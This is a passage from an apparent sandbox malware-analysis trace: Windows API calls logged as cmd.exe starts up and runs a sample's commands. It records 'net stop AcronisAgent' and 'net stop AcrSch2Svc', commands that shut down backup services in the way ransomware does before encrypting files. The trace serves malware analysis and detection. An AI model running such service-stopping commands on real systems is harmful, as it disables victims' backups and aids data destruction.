dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf0) returned 0xffffffff [0069.600] GetLastError () returned 0x2 [0069.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ebf0) returned 0x723470 [0069.600] GetProcessHeap () returned 0x710000 [0069.600] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7234b0, Size=0x4) returned 0x7234b0 [0069.600] FindClose (in: hFindFile=0x723470 | out: hFindFile=0x723470) returned 1 [0069.600] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.600] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.600] GetConsoleTitleW (in: lpConsoleTitle=0x32f0e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.600] InitializeProcThreadAttributeList (in: lpAttributeList=0x32ef70, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f038 | out: lpAttributeList=0x32ef70, lpSize=0x32f038) returned 1 [0069.600] UpdateProcThreadAttribute (in: lpAttributeList=0x32ef70, dwFlags=0x0, Attribute=0x60001, lpValue=0x32f030, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32ef70, lpPreviousValue=0x0) returned 1 [0069.600] GetStartupInfoW (in: lpStartupInfo=0x32ef2c | out: lpStartupInfo=0x32ef2c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.600] GetProcessHeap () returned 0x710000 [0069.600] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x18) returned 0x723470 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.600] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.601] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.601] GetProcessHeap () returned 0x710000 [0069.601] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x723470 | out: hHeap=0x710000) returned 1 [0069.601] GetProcessHeap () returned 0x710000 [0069.601] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xa) returned 0x71ff18 [0069.601] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.603] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop AcrSch2Svc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x32efcc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop AcrSch2Svc", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f018 | out: lpCommandLine="net stop AcrSch2Svc", lpProcessInformation=0x32f018*(hProcess=0x78, hThread=0x74, dwProcessId=0x7e4, dwThreadId=0xa00)) returned 1 [0070.043] CloseHandle (hObject=0x74) returned 1 [0070.043] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.043] GetProcessHeap () returned 0x710000 [0070.043] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725ef8 | out: hHeap=0x710000) returned 1 [0070.043] GetEnvironmentStringsW () returned 0x725ef8* [0070.043] GetProcessHeap () returned 0x710000 [0070.043] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb36) returned 0x7240b8 [0070.043] FreeEnvironmentStringsW (penv=0x725ef8) returned 1 [0070.044] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.352] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x32ef0c | out: lpExitCode=0x32ef0c*=0x2) returned 1 [0072.352] CloseHandle (hObject=0x78) returned 1 [0072.353] _vsnwprintf (in: _Buffer=0x32f054, _BufferCount=0x13, _Format="%08X", _ArgList=0x32ef18 | out: _Buffer="00000002") returned 8 [0072.353] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.353] GetProcessHeap () returned 0x710000 [0072.353] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7240b8 | out: hHeap=0x710000) returned 1 [0072.353] GetEnvironmentStringsW () returned 0x7240b8* [0072.353] GetProcessHeap () returned 0x710000 [0072.353] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb5c) returned 0x7295a0 [0072.353] FreeEnvironmentStringsW (penv=0x7240b8) returned 1 [0072.353] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.353] GetProcessHeap () returned 0x710000 [0072.353] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7295a0 | out: hHeap=0x710000) returned 1 [0072.353] GetEnvironmentStringsW () returned 0x7240b8* [0072.353] GetProcessHeap () returned 0x710000 [0072.353] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb5c) returned 0x7295a0 [0072.353] FreeEnvironmentStringsW (penv=0x7240b8) returned 1 [0072.353] GetProcessHeap () returned 0x710000 [0072.353] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x71ff18 | out: hHeap=0x710000) returned 1 [0072.353] DeleteProcThreadAttributeList (in: lpAttributeList=0x32ef70 | out: lpAttributeList=0x32ef70) [0072.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.353] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.354] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.354] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.354] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.354] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.354] SetConsoleInputExeNameW () returned 0x1 [0072.354] GetConsoleOutputCP () returned 0x1b5 [0072.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.354] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.355] exit (_Code=2) Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1476000" os_pid = "0x508" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop AcronisAgent" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 47 os_tid = 0x4a4 [0068.524] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33faa4 | out: lpSystemTimeAsFileTime=0x33faa4*(dwLowDateTime=0x97af20b0, dwHighDateTime=0x1d57b18)) [0068.524] GetCurrentProcessId () returned 0x508 [0068.524] GetCurrentThreadId () returned 0x4a4 [0068.524] GetTickCount () returned 0x114b194 [0068.524] QueryPerformanceCounter (in: lpPerformanceCount=0x33fa9c | out: lpPerformanceCount=0x33fa9c*=18874563935) returned 1 [0068.525] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0068.525] __set_app_type (_Type=0x1) [0068.525] __p__fmode () returned 0x74eb31f4 [0068.525] __p__commode () returned 0x74eb31fc [0068.525] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0068.526] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0068.526] GetCurrentThreadId () returned 0x4a4 [0068.526] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4a4) returned 0x60 [0068.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0068.526] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0068.526] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.526] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.526] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33fa34 | out: phkResult=0x33fa34*=0x0) returned 0x2 [0068.527] VirtualQuery (in: lpAddress=0x33fa6b, lpBuffer=0x33fa04, dwLength=0x1c | out: lpBuffer=0x33fa04*(BaseAddress=0x33f000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.527] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x33fa04, dwLength=0x1c | out: lpBuffer=0x33fa04*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.527] VirtualQuery (in: lpAddress=0x241000, lpBuffer=0x33fa04, dwLength=0x1c | out: lpBuffer=0x33fa04*(BaseAddress=0x241000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.527] VirtualQuery (in: lpAddress=0x243000, lpBuffer=0x33fa04, dwLength=0x1c | out: lpBuffer=0x33fa04*(BaseAddress=0x243000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.527] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x33fa04, dwLength=0x1c | out: lpBuffer=0x33fa04*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x13000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.527] GetConsoleOutputCP () returned 0x1b5 [0069.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.156] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.156] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.156] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.156] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.157] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.157] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.157] GetEnvironmentStringsW () returned 0x352030* [0069.157] GetProcessHeap () returned 0x340000 [0069.157] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xaca) returned 0x352b08 [0069.158] FreeEnvironmentStringsW (penv=0x352030) returned 1 [0069.158] GetProcessHeap () returned 0x340000 [0069.158] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x4) returned 0x350c68 [0069.158] GetEnvironmentStringsW () returned 0x352030* [0069.158] GetProcessHeap () returned 0x340000 [0069.158] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xaca) returned 0x3535e0 [0069.158] FreeEnvironmentStringsW (penv=0x352030) returned 1 [0069.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33e9a4 | out: phkResult=0x33e9a4*=0x68) returned 0x0 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x0, lpData=0x33e9b0*=0x0, lpcbData=0x33e9a8*=0x1000) returned 0x2 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x1, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x0, lpData=0x33e9b0*=0x1, lpcbData=0x33e9a8*=0x1000) returned 0x2 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x0, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x40, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x40, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.158] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x0, lpData=0x33e9b0*=0x40, lpcbData=0x33e9a8*=0x1000) returned 0x2 [0069.158] RegCloseKey (hKey=0x68) returned 0x0 [0069.158] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33e9a4 | out: phkResult=0x33e9a4*=0x68) returned 0x0 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x0, lpData=0x33e9b0*=0x40, lpcbData=0x33e9a8*=0x1000) returned 0x2 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x1, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x0, lpData=0x33e9b0*=0x1, lpcbData=0x33e9a8*=0x1000) returned 0x2 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x0, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x9, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x4, lpData=0x33e9b0*=0x9, lpcbData=0x33e9a8*=0x4) returned 0x0 [0069.159] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33e9ac, lpData=0x33e9b0, lpcbData=0x33e9a8*=0x1000 | out: lpType=0x33e9ac*=0x0, lpData=0x33e9b0*=0x9, lpcbData=0x33e9a8*=0x1000) returned 0x2 [0069.159] RegCloseKey (hKey=0x68) returned 0x0 [0069.159] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0069.159] srand (_Seed=0x5d97ebb3) [0069.159] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop AcronisAgent" [0069.159] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c net stop AcronisAgent" [0069.159] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.159] GetProcessHeap () returned 0x340000 [0069.159] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x210) returned 0x352030 [0069.159] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x352038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.160] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.160] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.160] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.160] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.160] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.160] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.160] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.160] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.160] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.160] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.160] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.160] GetProcessHeap () returned 0x340000 [0069.160] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x352b08 | out: hHeap=0x340000) returned 1 [0069.160] GetEnvironmentStringsW () returned 0x352248* [0069.160] GetProcessHeap () returned 0x340000 [0069.160] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xae2) returned 0x354ba8 [0069.160] FreeEnvironmentStringsW (penv=0x352248) returned 1 [0069.160] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.160] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.160] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.160] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.160] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.160] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.161] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.161] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.161] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.161] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.161] GetProcessHeap () returned 0x340000 [0069.161] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0x54) returned 0x355698 [0069.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x33f770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.161] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x33f770, lpFilePart=0x33f76c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f76c*="Desktop") returned 0x25 [0069.161] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.161] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33f4ec | out: lpFindFileData=0x33f4ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x351eb0 [0069.161] FindClose (in: hFindFile=0x351eb0 | out: hFindFile=0x351eb0) returned 1 [0069.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x33f4ec | out: lpFindFileData=0x33f4ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x963e2b90, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x963e2b90, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x351eb0 [0069.161] FindClose (in: hFindFile=0x351eb0 | out: hFindFile=0x351eb0) returned 1 [0069.161] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x33f4ec | out: lpFindFileData=0x33f4ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x351eb0 [0069.162] FindClose (in: hFindFile=0x351eb0 | out: hFindFile=0x351eb0) returned 1 [0069.162] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.162] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.162] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.162] GetProcessHeap () returned 0x340000 [0069.162] HeapFree (in: hHeap=0x340000, dwFlags=0x0, lpMem=0x354ba8 | out: hHeap=0x340000) returned 1 [0069.162] GetEnvironmentStringsW () returned 0x3540b8* [0069.162] GetProcessHeap () returned 0x340000 [0069.162] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x8, Size=0xb36) returned 0x355ef8 